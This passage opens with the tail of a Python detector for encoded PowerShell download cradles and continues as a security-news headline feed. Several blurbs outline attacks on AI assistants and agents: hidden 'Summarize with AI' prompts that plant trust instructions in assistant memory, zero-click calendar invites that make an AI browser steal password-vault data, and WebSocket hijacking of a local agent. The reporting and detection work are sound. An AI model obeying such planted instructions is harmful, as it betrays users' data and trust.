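        print("   indicators:", ", ".join(hit["indicators"]))
        if hit["decoded"]:
            print("   decoded:", hit["decoded"])
```

The parent-process requirement is what keeps this from paging on every scheduled PowerShell job that happens to use `-NoProfile`; the encoded-command decoding is what keeps the cradle indicators from being trivially hidden behind base64.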
LastPass warns of scam using fake email chains spoofing account hacking 'to draw attention and generate urgency' in users

What would you do if you could eavesdrop on an ongoing social engineering attack against your LastPass account?

Read Full Article →
Cisco Patches 48 Firewall Vulnerabilities with Two CVSS 10 Flaws

Cisco patches 48 vulnerabilities in Secure Firewall products, including two critical CVSS 10 flaws that could allow authentication bypass and remote code execution.

Read Full Article →
Iranian APT Hacked US Airport, Bank, Software Company

The attacks, observed since February, show that Iranian hackers already have a presence in the networks of US organizations.

Read Full Article →
Hexnode IdP brings device-aware authentication and zero trust to enterprise access

Hexnode has announced the launch of Hexnode IdP. By introducing this native identity layer, Hexnode delivers enterprise-grade authentication and identity management within a single, unified framework. While debuting as a dedicated Identity Provider (IdP), the solution marks a significant expansio...

Read Full Article →
Ghanaian man pleads guilty to role in $100 million fraud ring

A Ghanaian national pleaded guilty to his role in a massive fraud ring that stole over $100 million from victims across the United States through business email compromise attacks and romance scams. [...]

Read Full Article →
Cyolo PRO 7.0 expands OT-first secure remote access with AI session intelligence

Cyolo has released Cyolo PRO (Privileged Remote Operations) v7.0, a major update that expands OT-first secure remote access and strengthens protection for critical infrastructure and industrial environments without disrupting operations. Secure remote access (SRA) tools focus primarily on managin...

Read Full Article →
Cursor Automations turns code review and ops into background tasks

Cursor Automations, the always-on agent platform from Cursor, is expanding with a new generation of autonomous systems that streamline code review, incident response, and other engineering workflows. The platform runs AI agents on schedules or in response to development events. These triggers inc...

Read Full Article →
Iran-nexus APT Dust Specter targets Iraq officials with new malware

A campaign by Iran-linked group Dust Specter is targeting Iraqi officials with phishing emails delivering new malware families. Zscaler ThreatLabz researchers linked the Iran-nexus group Dust Specter to a campaign targeting Iraqi government officials. Threat actors impersonated the country’s Mini...

Read Full Article →
OpenAI’s GPT-5.4 doubles down on safety as competition heats up

In the midst of recent developments and controversies surrounding a contract with the U.S. Department of Defense, OpenAI released the GPT-5.4 model. The release comes at a time when users are reportedly leaving ChatGPT for rival chatbots, particularly Anthropic’s Claude. GPT-5.4 is rolling out gr...

Read Full Article →
Teenage hacker myth primed for a middle-age criminal makeover

The Hollywood image of criminal hackers being largely teenage ne’er do wells is due for an update. That’s because profit-seeking career criminals — often approaching middle age — make up the largest cohort of today’s cybercriminals, according to an analysis of criminal cases carried out by Orange...

Read Full Article →
U.S. CISA adds Apple, Rockwell, and Hikvision flaws to its Known Exploited Vulnerabilities catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Rockwell, and Hikvision flaws to its Known Exploited Vulnerabilities...

Read Full Article →
March 2026 Patch Tuesday forecast: Is AI security an oxymoron?

Developers and analysts are using more AI tools to produce code and to test both the performance and security of the finished products. They are also embedding AI functionality in their products directly. But just how secure are these AI tools and routines themselves? Recent reports show they suf...

Read Full Article →
China-Linked Hackers Use TernDoor, PeerTime, BruteEntry in South American Telecom Attacks

A China-linked advanced persistent threat (APT) actor has been targeting critical telecommunications infrastructure in South America since 2024, targeting Windows and Linux systems and edge devices with three different implants. The activity is being tracked by Cisco Talos under the moniker UAT-9...

Read Full Article →
Google GTIG: 90 zero-day flaws exploited in 2025 as enterprise targets grow

Google’s Threat Intelligence Group (GTIG) identified 90 zero-day vulnerabilities exploited in the wild in 2025, up from 78 in 2024, with a growing share targeting enterprise systems. While slightly below the 100 obse...

Read Full Article →
Backup strategies are working, and ransomware gangs are responding with data theft

Business email compromise (BEC) and funds transfer fraud combined for 58% of all cyber insurance claims filed in 2025, according to data from Coalition covering more than 100,000 policyholders across the United States, Canada, the United Kingdom, Australia, and Germany. BEC was the single most co...

Read Full Article →
Zero-day exploits hit enterprises faster and harder

Google tracked 90 vulnerabilities exploited as zero-days last year, with Chinese cyberespionage groups doubling their count from 2024 and commercial surveillance vendors overtaking state-sponsored hackers for the first time. Nearly half of the recorded zero-days targeted enterprise technologies s...

Read Full Article →
Why phishing still works today

In this Help Net Security video, Gal Livschitz, Senior Penetration Tester at Terra Security, explains how phishing has evolved and why employees still fall for it. He outlines how phishing now uses HTTPS, branded pages, and lookalike domains, making attacks harder to spot. He highlights communica...

Read Full Article →
Hikvision and Rockwell Automation CVSS 9.8 Flaws Added to CISA KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added two security flaws impacting Hikvision and Rockwell Automation products to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The critical-severity vulnerabilities are listed...

Read Full Article →
7 signs you urgently need an MSSP

Managed security service providers can raise an organisation's security level in a lasting way. A managed security service provider (MSSP) offers its customers a comprehensive range of security services. As a third party, an MSSP can take on the workload of the internal I...

Read Full Article →
Europe in the crosshairs of cyber identity thieves

German companies should brace themselves: both state and "private" actors have them in their sights. As Darktrace's experts lay out in their current Threat Report 2026, cloud and email accounts remain the number one entry point in Europe. According to the report...

Read Full Article →
Risky Bulletin: Iranian hackers are scanning for security cameras to aid missile strikes

Iran attempts to hack security cameras to support its missile strikes, Israel bombs Iran’s cyber headquarters, authorities take down LeakBase and Tycoon 2FA, and TikTok says ‘no’ to encrypted private messaging.

Read Full Article →
Chinese state hackers target telcos with new malware toolkit

A China-linked advanced persistent threat actor tracked as UAT-9244 has been targeting telecommunication service providers in South America since 2024, compromising Windows, Linux, and network-edge devices. [...]

Read Full Article →
Nation-State Actor Embraces AI Malware Assembly Line

Pakistan's APT36 threat group has begun using vibe-coding to churn out mediocre malware, but at a scale that could overwhelm defenses.

Read Full Article →
Tycoon 2FA Goes Boom as Europol, Vendors Bust Phishing Platform

The phishing-as-a-service platform was popular among cyber threat actors because of its ability to bypass multifactor authentication defenses.

Read Full Article →
FBI targeted with ‘suspicious’ activity on its networks

The bureau didn’t provide any further details on the incident, which reportedly targeted a network for managing surveillance activity.

Read Full Article →
Wikipedia hit by self-propagating JavaScript worm that vandalized pages

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis. [...]

Read Full Article →
Cisco Drops 48 New Firewall Vulnerabilities, 2 Critical

Edge bugs are so fetch, and Cisco just patched 50 new ones, including some heavy hitters with 10 out of 10 scores on the CVSS scale.

Read Full Article →
Hackers exploit OpenClaw to spread malware via GitHub - and a little help from Bing

OpenClaw's popularity is proving to be a great vessel for malware distribution, especially when it's advertised via Bing.

Read Full Article →
WordPress membership plugin bug exploited to create admin accounts

Hackers are exploiting a critical vulnerability in the User Registration & Membership plugin, which is installed on more than 60,000 WordPress sites. [...]

Read Full Article →
FBI arrests suspect linked to $46M crypto theft from US Marshals

A U.S. government contractor's son, accused of stealing more than $46 million in cryptocurrency from the U.S. Marshals Service, was arrested Wednesday on the island of Saint Martin. [...]

Read Full Article →
Phobos ransomware leader pleads guilty, faces up to 20 years in prison

The 43-year-old Russian national ran a ransomware operation that impacted more than 1,000 victims globally. The conspiracy netted more than $39 million in extortion payments.

Read Full Article →
PleaseFix Flaw Lets Hackers Access 1Password Vault via Comet AI Browser

Researchers at Zenity Labs uncover PleaseFix flaws in Perplexity’s Comet browser. See how zero-click calendar invites allow AI agents to steal 1Password credentials and personal files.

Read Full Article →
Software Development Practices Help Enterprises Tackle Real-Life Risks

Organizations can borrow secure-by-design processes to manage non-technical challenges like governance or the inevitable human error.

Read Full Article →
Cisco reveals 2 max-severity defects in firewall management software

The vendor said it’s not aware of any active exploitation of the vulnerabilities, which could allow remote attackers to achieve root access and execute code.

Read Full Article →
Cisco Confirms Active Exploitation of Two Catalyst SD-WAN Manager Vulnerabilities

Cisco has disclosed that two more vulnerabilities affecting Catalyst SD-WAN Manager (formerly SD-WAN vManage) have come under active exploitation in the wild. The vulnerabilities in question are listed below - CVE-2026-20122 (CVSS score: 7.1) - An arbitrary file overwrite vulnerability that could...

Read Full Article →
Google says 90 zero-days were exploited in attacks last year

Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities actively exploited throughout 2025, almost half of them in enterprise software and appliances. [...]

Read Full Article →
2026 Browser Data Reveals Major Enterprise Security Blind Spots

The browser is becoming the operating system for modern work, yet many enterprises still treat it as an extension of network or endpoint security. Keep Aware's 2026 State of Browser Security Report shows 41% of employees used AI web tools while browser-based phishing, extensions, and social engin...

Read Full Article →
Google: Half of 2025’s 90 Exploited Zero-Days Aimed at Enterprises

Less than half of the total zero-days have been attributed to a threat actor, but spyware vendors and China are in the lead. The post Google: Half of 2025’s 90 Exploited Zero-Days Aimed at Enterprises appeared first on SecurityWeek.

Read Full Article →
Russian APT targets Ukraine with BadPaw and MeowMeow malware

Researchers uncovered a Russian campaign targeting Ukrainian entities with new malware families BadPaw and MeowMeow delivered through phishing emails. Researchers reported a phishing campaign linked to Russia that targets Ukrainian organizations using two new malware families, BadPaw and MeowMeow...

Read Full Article →
AI powers innovation – but it’s also powering the next wave of cyber attacks

With AI enabling fully automated cyber attacks, cyber resiliency has emerged as a critical strategy.

Read Full Article →
LeakBase Cybercrime and Hacker Forum Seized

Europol seizes LeakBase cybercrime and hacker forum used to trade stolen data, disrupting a global platform with over 140,000 members.

Read Full Article →
Europol: Large marketplace for stolen data shut down

Europol coordinated the strike against Leakbase. According to Europol, Amsterdam police, as part of an international operation, have shut down one of the world's largest marketplaces for stolen data. Leakbase had 142,000 registered users worldwide, as the Euro...

Read Full Article →
Authorities Shut Down Tycoon 2FA Phishing Platform Used to Bypass MFA

Europol and partners dismantle Tycoon 2FA phishing service used to bypass MFA, disrupting a global phishing-as-a-service operation targeting organisations.

Read Full Article →
Russian Ransomware Operator Pleads Guilty in US

Evgenii Ptitsyn was extradited to the United States from South Korea in November 2024. The post Russian Ransomware Operator Pleads Guilty in US appeared first on SecurityWeek.

Read Full Article →
Coruna Exploit Kit Targets Older iPhones in Multi-Stage Campaigns

Exploit kit "Coruna" targets iPhones running iOS 13.0 to 17.2.1, focusing on financial data theft

Read Full Article →
Dust Specter Targets Iraqi Officials with New SPLITDROP and GHOSTFORM Malware

A suspected Iran-nexus threat actor has been attributed to a campaign targeting government officials in Iraq by impersonating the country's Ministry of Foreign Affairs to deliver a set of never-before-seen malware. Zscaler ThreatLabz, which observed the activity in January 2026, is tracking the c...

Read Full Article →
Where Multi-Factor Authentication Stops and Credential Abuse Starts

Organizations typically roll out multi-factor authentication (MFA) and assume stolen passwords are no longer enough to access systems. In Windows environments, that assumption is often wrong. Attackers still compromise networks every day using valid credentials. The issue is not MFA itself, but c...

Read Full Article →
Zero-Click FreeScout Bug Enables Remote Code Execution

Ox Security warns that Mail2Shell could enable threat actors to hijack FreeScout systems without user interaction

Read Full Article →
Major data leak forum LeakBase seized by FBI, Europol, and shut down

The website was taken offline, and potential members arrested.

Read Full Article →
APT28-Linked Campaign Deploys BadPaw Loader and MeowMeow Backdoor in Ukraine

Cybersecurity researchers have disclosed details of a new Russian cyber campaign that has targeted Ukrainian entities with two previously undocumented malware families named BadPaw and MeowMeow. "The attack chain initiates with a phishing email containing a link to a ZIP archive. Once extracted, ...

Read Full Article →
Microsoft, Europol take down global phishing as a service network which was able to bypass 2FA with ease

Tycoon 2FA is no more thanks to a major law enforcement operation.

Read Full Article →
Europol Operation Seizes LeakBase Data Breach Site

A global operation has resulted in the takedown of popular cybercrime forum LeakBase

Read Full Article →
Europol-Led Operation Takes Down Tycoon 2FA Phishing-as-a-Service Linked to 64,000 Attacks

Tycoon 2FA, one of the prominent phishing-as-a-service (PhaaS) toolkits that allowed cybercriminals to stage adversary-in-the-middle (AitM) credential harvesting attacks at scale, was dismantled by a coalition of law enforcement agencies and security companies. The subscription-based phishing kit...

Read Full Article →
FBI and Europol Seize LeakBase Forum Used to Trade Stolen Credentials

A joint law enforcement operation has dismantled LeakBase, one of the world's largest online forums for cybercriminals to buy and sell stolen data and cybercrime tools. The LeakBase forum, per the U.S. Department of Justice (DoJ), had over 142,000 members and more than 215,000 messages between me...

Read Full Article →
The Zomato API Bug That Turns Phone Numbers Into Location Intel

Zomato’s “Friend Recommendations” API allows unilateral contact syncing. By uploading a phone number, bad actors can extract a user’s restaurant recommendation history and restaurant coordinates. By mapping overlapping delivery radii, an attacker can estimate a user's approximate physical locatio...

Read Full Article →
Microsoft leads takedown of Tycoon2FA phishing service infrastructure

The infrastructure hosting the Tycoon2FA service, which Europol said was among the largest phishing operations worldwide, has been taken down by a coalition of IT companies and law enforcement agencies. At least temporarily, this removes access to one more tool for evading multifactor authenticat...

Read Full Article →
Global coalition dismantles Tycoon 2FA phishing kit

Microsoft, which led the effort, said it seized 330 domains that powered the phishing platform’s core infrastructure. The alleged creator was also named in a civil complaint. The post Global coalition dismantles Tycoon 2FA phishing kit appeared first on CyberScoop.

Read Full Article →
VMware Aria Operations Bug Exploited, Cloud Resources at Risk

Exploitation of the command injection flaw in VMware Aria Operations could grant an attacker broad access to victims' cloud environments.

Read Full Article →
LLMs are getting better at unmasking people online

The author of a new study told CyberScoop he's "very worried,” describing deanonymization capabilities of AI as a “large scale invasion of privacy.” The post LLMs are getting better at unmasking people online appeared first on CyberScoop.

Read Full Article →
149 Hacktivist DDoS Attacks Hit 110 Organizations in 16 Countries After Middle East Conflict

Cybersecurity researchers have warned of a surge in retaliatory hacktivist activity following the U.S.-Israel coordinated military campaign against Iran, codenamed Epic Fury and Roaring Lion. "The hacktivist threat in the Middle East is highly lopsided, with two groups, Keymous+ and DieNet, drivi...

Read Full Article →
Global Takedown Neutralizes Tycoon2FA Phishing Service

Law enforcers and industry partners have taken down notorious phishing-as-a-service platform Tycoon2FA

Read Full Article →
LexisNexis confirms data breach, says hackers hit customer and business info

FulcrumSec leaked roughly 2GB of company data, but LexisNexis says it's old and outdated.

Read Full Article →
Dark Reading Confidential: This Threat Hunter Helped Cops Bust Up An African Cybercrime Syndicate

Dark Reading Confidential Episode 15: Interpol relied on Will Thomas and team to help break up a sprawling cybercrime ring, leading to the arrest of 574 suspects, the recovery of more than $3 million, and the decryption of six malware variants. Here's his story.

Read Full Article →
Surge in Attacks on Surveillance Cameras Linked to Iranian Hackers

Increased attempts to compromise surveillance cameras linked to Iran during Middle East conflict

Read Full Article →
Multi-Stage "BadPaw" Malware Campaign Targets Ukraine

Malware campaign uses Ukrainian email service for credibility, deploying "BadPaw" to execute attacks

Read Full Article →
Coruna iOS Exploit Kit Uses 23 Exploits Across Five Chains Targeting iOS 13–17.2.1

Google said it identified a "new and powerful" exploit kit dubbed Coruna (aka CryptoWaters) targeting Apple iPhone models running iOS versions between 13.0 and 17.2.1. The exploit kit featured five full iOS exploit chains and a total of 23 exploits, Google Threat Intelligence Group (GTIG) said. I...

Read Full Article →
Paint giant AkzoNobel reveals data breach, says US site was affected

Ransomware operators Anubis claimed the breach, saying it stole 170GB of sensitive data

Read Full Article →
Manipulating AI Summarization Features

Microsoft is reporting: Companies are embedding hidden instructions in “Summarize with AI” buttons that, when clicked, attempt to inject persistence commands into an AI assistant’s memory via URL prompt parameters…. These prompts instruct the AI to “remember [Company] as a trusted source” or “re...

Read Full Article →
Hack on French medical site sees over 15 million records leaked, including private health info

A software supplier to France's health ministry was breached, with some very private information possible leaked.

Read Full Article →
New RFP Template for AI Usage Control and AI Governance

As AI becomes the central engine for enterprise productivity, security leaders are finally getting the green light — and the budget — to secure it. But there’s a quiet crisis unfolding in the boardroom: many organizations know they need "AI Governance," but they have no idea what they are actuall...

Read Full Article →
China's Silver Dragon Razes Governments in EU, SE Asia

The emerging actor, part of the APT41 nexus, gains initial access via phishing, and uses legitimate network services to obscure cyber espionage activities.

Read Full Article →
Calls for Global Digital Estate Standard as Posthumous Deepfake Fraud Risk Grows

The OpenID Foundation warns that fragmented policies on posthumous digital accounts could open the door for fraudsters to exploit AI deepfakes

Read Full Article →
Fake Laravel Packages on Packagist Deploy RAT on Windows, macOS, and Linux

Cybersecurity researchers have flagged malicious Packagist PHP packages masquerading as Laravel utilities that act as a conduit for a cross-platform remote access trojan (RAT) that's functional on Windows, macOS, and Linux systems. The names of the packages are listed below - nhattuanbl/lara-help...

Read Full Article →
APT41-Linked Silver Dragon Targets Governments Using Cobalt Strike and Google Drive C2

Cybersecurity researchers have disclosed details of an advanced persistent threat (APT) group dubbed Silver Dragon that has been linked to cyber attacks targeting entities in Europe and Southeast Asia since at least mid-2024. "Silver Dragon gains its initial access by exploiting public-facing int...

Read Full Article →
Risky Business #827 -- Iranian cyber threat actors are down but not out

On this week’s show, Patrick Gray, Adam Boileau and James Wilson discuss the week’s cybersecurity news. They cover: The US-Israeli attack on Iran had a whole lot of cyber. It’s clearly in the playbook now! The NSA Triangulation / L3 Harris Trenchant iOS exploit kit is on the loose, and being used...

Read Full Article →
A suite of government hacking tools targeting iPhones is now being used by cybercriminals

Security researchers say exploits used by governments to hack into iPhones have been found to be used by cybercriminals. They warned of an emerging market for "secondhand" exploits.

Read Full Article →
Risky Bulletin: Cyber Command conducted cyberattacks ahead of Iran strikes

The US conducted cyberattacks ahead of strikes on Iran, Russia aims for internet independence by 2028, Google finds a new iOS exploit kit in the wild, and Chrome moves to a two-week release cycle.

Read Full Article →
Indian APT 'Sloppy Lemming' Targets Defense, Critical Infrastructure

India-nexus cyber threat actors are growing more active and sophisticated, using custom tools coded in Rust and cloud-based command and control.

Read Full Article →
'A human-chosen password doesn't stand a chance': OpenClaw has yet another major security flaw — here's what we know about "ClawJacked"

Don't leave your OpenClaw with an easy password, experts warn.

Read Full Article →
Qualcomm Zero-Day Exploited in Targeted Android Attacks

The exploitation activity against CVE-2026-21385, a high-severity memory corruption flaw, could be tied to commercial spyware or nation-state threat groups.

Read Full Article →
Fake Tech Support Spam Deploys Customized Havoc C2 Across Organizations

Threat hunters have called attention to a new campaign as part of which bad actors masqueraded as fake IT support to deliver the Havoc command-and-control (C2) framework as a precursor to data exfiltration or ransomware attack. The intrusions, identified by Huntress last month across five partner...

Read Full Article →
BSIMM16 confirms: AI redefines AppSec

AI coding is the new reality — and it will further destabilize software supply chain security. So step up your AppSec.

Read Full Article →
Microsoft warns of OAuth phishing campaigns able to bypass email and browser defenses - says 'these campaigns demonstrate that this abuse is operational, not theoretical'

An OAuth feature is being abused in the wild to drop malware to people's computers.

Read Full Article →
Building a High-Impact Tier 1: The 3 Steps CISOs Must Follow

Every CISO knows the uncomfortable truth about their Security Operations Center: the people most responsible for catching threats in real time are the people with the least experience. Tier 1 analysts sit at the front line of detection, and yet they are also the most vulnerable to the cognitive a...

Read Full Article →
Open-Source CyberStrikeAI Deployed in AI-Driven FortiGate Attacks Across 55 Countries

The threat actor behind the recently disclosed artificial intelligence (AI)-assisted campaign targeting Fortinet FortiGate appliances leveraged an open-source, AI-native security testing platform called CyberStrikeAI to execute the attacks. The new findings come from Team Cymru, which detected it...

Read Full Article →
'The attack requires no exploit, no user clicks, and no explicit request for sensitive actions': Experts say Perplexity's AI Comet browser can be hijacked to steal your passwords

Security researchers found a zero-click exploit in Perplexity AI browser, and helped fix it.

Read Full Article →
This new phishing campaign uses a fake Google Account security page to steal passcodes and more

Hackers don't need an app to steal login credentials anymore - a PWA will do.

Read Full Article →
Starkiller Phishing Suite Uses AitM Reverse Proxy to Bypass Multi-Factor Authentication

Cybersecurity researchers have disclosed details of a new phishing suite called Starkiller that proxies legitimate login pages to bypass multi-factor authentication (MFA) protections. It's advertised as a cybercrime platform by a threat group calling itself Jinkusu, granting customers access to a...

Read Full Article →
Iranian Cyber Threat Actor Targets Iraqi Government Officials in AI-Powered Campaign

Zscaler ThreatLabz assessed with medium to high confidence that an Iranian adversary targeted Iraq’s Ministry of Foreign Affairs in a new cyber-attack

Read Full Article →
Microsoft Warns OAuth Redirect Abuse Delivers Malware to Government Targets

Microsoft on Monday warned of phishing campaigns that employ phishing emails and OAuth URL redirection mechanisms to bypass conventional phishing defenses implemented in email and browsers. The activity, the company said, targets government and public-sector organizations with the end goal of red...

Read Full Article →
SloppyLemming Targets Pakistan and Bangladesh Governments Using Dual Malware Chains

The threat activity cluster known as SloppyLemming has been attributed to a fresh set of attacks targeting government entities and critical infrastructure operators in Pakistan and Bangladesh. The activity, per Arctic Wolf, took place between January 2025 and January 2026. It involves the use of ...

Read Full Article →
The Biosig Project libbiosig Intan CLP parsing heap-based buffer overflow vulnerability + 1 similar
The Biosig Project libbiosig ABF parsing out-of-bounds read vulnerability
Hackers hijack .arpa domain for phishing scams — hosting malicious websites and domains where no one can spot them

Cybercriminals exploit the .arpa domain and IPv6 addresses to deliver phishing pages, bypassing traditional security and stealing credentials.

Read Full Article →
Cybercriminals are hiring women for more authentic social engineering scams — and are promising up to $1,000 per call

Cybercriminal group SLSH recruits women to impersonate IT helpdesks, offering up to $1,000 per call while targeting major companies.

Read Full Article →
New Chrome Vulnerability Let Malicious Extensions Escalate Privileges via Gemini Panel

Cybersecurity researchers have disclosed details of a now-patched security flaw in Google Chrome that could have permitted attackers to escalate privileges and gain access to local files on the system. The vulnerability, tracked as CVE-2026-0628 (CVSS score: 8.8), has been described as a case of ...

Read Full Article →
Expect Iran to Launch Cyber-Attacks Globally, Warns Google Head of Threat Intel

John Hultquist suggests “aggressive” Iranian cyber attackers will target the US and its Gulf allies with plausibly deniable ransomware attacks, hacktivist campaigns and more

Read Full Article →
LLM-Assisted Deanonymization

Turns out that LLMs are good at de-anonymization: We show that LLM agents can figure out who you are from your anonymous online posts. Across Hacker News, Reddit, LinkedIn, and anonymized interview transcripts, our method identifies users with high precision and scales to tens of thousands of c...

Read Full Article →
ClawJacked Bug Enables Covert AI Agent Hijacking

Oasis Security reveals how a new ClawJacked vulnerability could allow attackers to silently take over a victim’s OpenClaw agent

Read Full Article →
Ransomware Payments Decline 8% as Attacks Surge 50%

Chainalysis reveals a big surge in median ransomware payment size in 2025 despite overall drop in criminal revenue

Read Full Article →
Bug in Google's Gemini AI Panel Opens Door to Hijacking

Attackers could have exploited the vulnerability to escalate privileges, violate user privacy while browsing, and access sensitive resources.

Read Full Article →
North Korean Hackers Publish 26 npm Packages Hiding Pastebin C2 for Cross-Platform RAT

Cybersecurity researchers have disclosed a new iteration of the ongoing Contagious Interview campaign, where the North Korean threat actors have published a set of 26 malicious packages to the npm registry. The packages masquerade as developer tools, but contain functionality to extract the actua...

Read Full Article →
Risky Bulletin: LLMs can deanonymize internet users based on their comments

LLMs can deanonymize internet users based on their comments, CISA gets a new acting director, hackers steal 15 million records from the French Ministry of Health, and Google takes down an ad fraud botnet.

Read Full Article →
Modernization-led cloud migration: The missing step in seizing the AI opportunity

How businesses can master modernization-led migration, including key steps like mapping and securing long-term governance.

Read Full Article →
I smell a RAT — new Android malware can hack every top phone maker's security, and costs less than a second-hand iPhone

Oblivion is an Android RAT which bypasses permissions, intercepts messages, and enables hidden remote control across devices from Samsung, Xiaomi, and OPPO.

Read Full Article →
ClawJacked Flaw Lets Malicious Sites Hijack Local OpenClaw AI Agents via WebSocket

OpenClaw has fixed a high-severity security issue that, if successfully exploited, could have allowed a malicious website to connect to a locally running artificial intelligence (AI) agent and take over control. "Our vulnerability lives in the core system itself – no plugins, no marketplace, no u...

Read Full Article →
Who is the Kimwolf Botmaster “Dort”?

In early January 2026, KrebsOnSecurity revealed how a security researcher disclosed a vulnerability that was used to assemble Kimwolf, the world's largest and most disruptive botnet. Since then, the person in control of Kimwolf -- who goes by the handle "Dort" -- has coordinated a barrage of dist...

Read Full Article →
Looking for a holiday bargain? Don't get caught out — experts warn of dark web travel agencies using stolen credit cards to buy hotels, flights, and more

Cybercriminal networks resell real travel bookings bought with stolen credit cards.

Read Full Article →

#Security Vendor Blog

PLEASE_READ_ME: The Opportunistic Ransomware Devastating MySQL Servers

Guardicore Labs uncovers a Ransomware detection campaign targeting MySQL servers. Attackers use Double Extortion and publish data to pressure victims.

Read Full Article →
The Oracle of Delphi Will Steal Your Credentials

Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced RDP passwords to connect to the victim, then downloaded and executed a previously undetected malware, which we named Trojan.sysscan.

Read Full Article →
Threats Making WAVs - Incident Response to a Cryptomining Attack

Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, infection, network propagation and malware analysis and recommendations for optimizing incident res...

Read Full Article →
An Investigation Into Years of Undetected Operations Targeting High-Value Sectors

In-depth analysis of threat activity we call CL-UNK-1068. We discuss their toolset, including tunneling, reconnaissance and credential theft. The post An Investigation Into Years of Undetected Operations Targeting High-Value Sectors appeared first on Unit 42.

Read Full Article →
Mobile malware evolution in 2025

Statistics on Android malware and the most notable mobile threats of 2025: preinstalled backdoors Keenadu and Triada, spyware Trojans, the Kimwolf IoT botnet, and Mamont banking Trojans.

Read Full Article →
Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran

Unit 42 details recent Iranian cyberattack activity, sharing direct observations of phishing, hacktivist activity and cybercrime. We include recommendations for defenders. The post Threat Brief: March 2026 Escalation of Cyber Risk Related to Iran appeared first on Unit 42.

Read Full Article →
Taming Agentic Browsers: Vulnerability in Chrome Allowed Extensions to Hijack New Gemini Panel

A high-severity CVE-2026-0628 in Chrome's Gemini allowed local file access and privacy invasion. Google quickly patched the flaw. The post Taming Agentic Browsers: Vulnerability in Chrome Allowed Extensions to Hijack New Gemini Panel appeared first on Unit 42.

Read Full Article →
Cyber Advisory: Increased Cyber Risk Amid U.S.–Israel–Iran Escalation

Insights and recommended defensive measures from Sophos X-Ops Counter Threat Unit. (Categories: Security Operations. Tags: Sophos CTU, Iran, Operation Epic Fury.)

Read Full Article →

#Tech

A Brain-Invading Worm Spread By Rats and Snails Has Reached California

Researchers have found evidence the rat lungworm is now endemic in southern California

Read Full Article →
Firefox taps Anthropic AI bug hunter, but rancid RAM still flipping bits

Now if only device makers would deliver higher quality components. Thanks to Anthropic's AI and its bug-detecting abilities, Firefox users can now enjoy stronger security. Unfortunately, if browser crashes rather than security flaws are the problem, Claude probably can't help…

Read Full Article →
5 ways rules and regulations can help guide your AI innovation

Governance, when handled correctly, can become a route to the successful implementation of emerging technologies. Five business leaders share their experiences.

Read Full Article →
GPT 5.4 solves previously unsolved math problem with help from long-forgotten human research

GPT just keeps getting better at mathematics, increasingly solving the trickiest of problems. In January, AI testing company Epoch AI found that a previous version of the AI model, GPT-5.2 Pro, had solved 31% of its mathematical challenges, a rise from the previous best score of 19%. The newest ve...

Read Full Article →
Cisco warns of two more SD-WAN bugs under active attack

Switchzilla says flaws could allow file overwrites or privilege escalation. Just when network admins thought the Cisco SD-WAN patch queue might finally be shrinking, Switchzilla has confirmed miscreants are exploiting more vulnerabilities in its SD-WAN management software…

Read Full Article →
Microsoft spots ClickFix campaign getting users to self-pwn on Windows Terminal

Crooks tweak familiar copy-paste ruse so that victims run malicious commands themselves. A new twist on the long-running ClickFix scam is now tricking Windows users into launching Windows Terminal and pasting malware into it themselves – handing the credential-stealing Lumma infostealer the keys t...

Read Full Article →
The privacy nightmare hiding inside California’s new kid-safety rule

I love my home state of California. But sometimes its best intentions go awry. It’s not surprising that California’s legislature passed the Digital Age Assurance Act (AB 1043) last October—age verification is currently a popular focus within governments. (And the reason for Discord’s current st...

Read Full Article →
UK lawmakers back licensing‑first approach, adding pressure to global AI copyright standards

AI developers must obtain licenses for copyrighted material before using it to train models, a committee of the House of Lords, the UK Parliament’s upper chamber, said Thursday. The committee called the approach “licensing-first,” meaning no training on protected works without prior permission an...

Read Full Article →
What the COBOL Translation Backlash Gets Right — and Wrong

When Anthropic published a blog post last week describing how Claude Code can analyze and translate COBOL, the market rejoiced at yet another proof point of the power of LLMs. Critics also reacted swiftly, noting that translating COBOL is not the same as modernizing a system. After all, a system ...

Read Full Article →
Microsoft finally gets around to fixing Windows 10 Recovery Environment after breaking it in October

Released from the curse of the update bork fairy. Microsoft has finally fixed a Windows Recovery Environment (WinRE) bug it introduced in Windows 10's final update…

Read Full Article →
UK Treasury not sure about ditching Oracle to join £1.7 billion shared services program it is funding

It promised £1.15B… but finance ministry yet to show 'formal commitment' to adopt Workday SaaS, watchdog says. The UK's Treasury is yet to fully commit to joining a multi-billion pound ERP and HR shared services program it has agreed to fund, potentially slashing any resulting savings, according t...

Read Full Article →
BMW brings AI-powered humanoid robots to its Leipzig factory

While C-3PO was science fiction in the first Star Wars film in 1977, humanoid robots are already a reality on BMW's production floors. After introducing Figure 2 at the Spartanburg plant in the United States, BMW is also deploying humanoid robots at its German plant...

Read Full Article →
Okta CEO ‘paranoid’ as vibe coders stir SaaS-pocalypse fears

It’s ok, Todd. You’re only paranoid if you’re wrong. Okta chairman and CEO Todd McKinnon said he believes it would be difficult for an LLM alone to replicate the quality of SaaS applications his company provides, but that doesn’t stop him from worrying about competition from bots.…

Read Full Article →
Chrome 145 update fixes several critical browser vulnerabilities

Instead of the expected new major version Chrome 146, Google just released another update for Chrome 145 (presumably this version’s final security update). In the new Chrome versions 145.0.7632.159/160 for Windows and macOS and 145.0.7632.159 for Linux, the developers have fixed 10 security vulne...

Read Full Article →
The era of agentic payments is fast approaching: “Is our company ready?”

Major AI solution vendors, payment platforms, and retailers are rolling out agentic payments (agentic payments) one after another. Customers gain the convenience of “a few clicks,” but companies must weigh whether that is worth accepting risks ranging from weakened brand control to security and financial exposure. ChatGPT is already rapidly establishing itself as the “first choice” for product search. Some observers predict that unless Google moves first, a flow in which ChatGPT handles even the payment could soon become reality. But the burden on merchants may grow: losing control of the customer experience, and malfunc...

Read Full Article →
CIO Korea and IBM Korea hold breakfast forum for manufacturing and retail IT leaders: “Agentic AI success depends on operational and data readiness”

